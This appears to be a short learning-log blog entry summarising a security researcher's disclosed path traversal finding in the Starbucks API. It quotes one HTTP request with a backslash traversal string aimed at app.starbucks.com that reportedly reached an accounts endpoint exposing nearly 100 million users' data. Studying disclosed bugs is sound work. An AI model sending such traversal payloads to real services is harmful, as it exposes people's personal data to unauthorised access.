Day 91 comes with some readings on Sam Curry’s find in starbucks.
Into Starbucks Database
From Sam (CoffeeJunkie). Reading this post from Sam Curry, It came pretty handy to see how path traversal vulnerabilities can come pretty handy these times. He found a call in the starbucks API which can retrieve the information of nearly 100 million users with the following path traversal attack.
GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Accounts\ HTTP/1.1 Host: app.starbucks.com
Where the path
\search\v1\Accounts\ retrieve the information of the nearly 100 million users.